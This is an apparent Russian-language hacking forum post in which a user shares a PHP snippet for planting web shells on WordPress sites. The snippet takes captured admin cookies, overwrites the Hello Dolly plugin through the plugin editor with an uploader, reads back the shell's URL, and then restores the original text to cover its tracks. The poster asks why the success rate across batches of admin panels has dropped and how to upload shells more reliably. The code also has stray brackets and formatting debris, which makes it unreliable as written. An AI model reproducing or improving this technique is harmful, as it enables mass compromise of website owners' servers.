01.08.2022, 13:11
|
|
Новичок
Регистрация: 18.07.2022
Сообщений: 5
Провел на форуме:
1825
Репутация:
0
|
|
Понадобился скрипт для заливки шеллов в вп, нашел свою старую наработку через плагин Hello Dolly, вот ключевой кусок который показывает концепцию
PHP код:
$hello_edit='http://'.$path.'/wp-admin/plugin-editor.php?file=hello.php'
$hello_path=]'http://'.$path.'/wp-content/plugins/hello.php';
$plugin_editor='http://'.$path.'/wp-admin/plugin-editor.php';
$response=curlPostCookies($hello_edit,'',$cookies);
$data=extractFormData($response);
//var_dump($data);
//var_dump($code);
//exit();
$code=urlencode($code);
$response=curlPostCookies($plugin_editor,$data.'&newcontent='.$code, $cookies);
$response=curlGet($hello_path);
//var_dump($response);
preg_match('~url:(.+)~', $response,$matches);
$url=$matches[1];
/echo $url;
$response=curlPostCookies($hello_edit,'',$cookies);
$data=extractFormData($response);
]$response=curlPostCookies($hello_edit[COLOR="#007700"],$data.'&newcontent='.urlencode($hello_dolly_text),$cookies);
if($url)
return$url;
return false;
Суть ясна - меняем текст плагина на наш пхп код (в моем случае это заливщик который ищет папку на запись и выдает урл куда загрузился шелл). Года три назад пробив был нормальным в принципе, 10% шеллов с пачки админок получалось, сейчас это вообще не работает, практически ни один шелл не залился. Мб что-то поменялось с тех пор или waf стали настолько продвинутыми? Может есть какой-то более адекватный способ грузится? |
|
|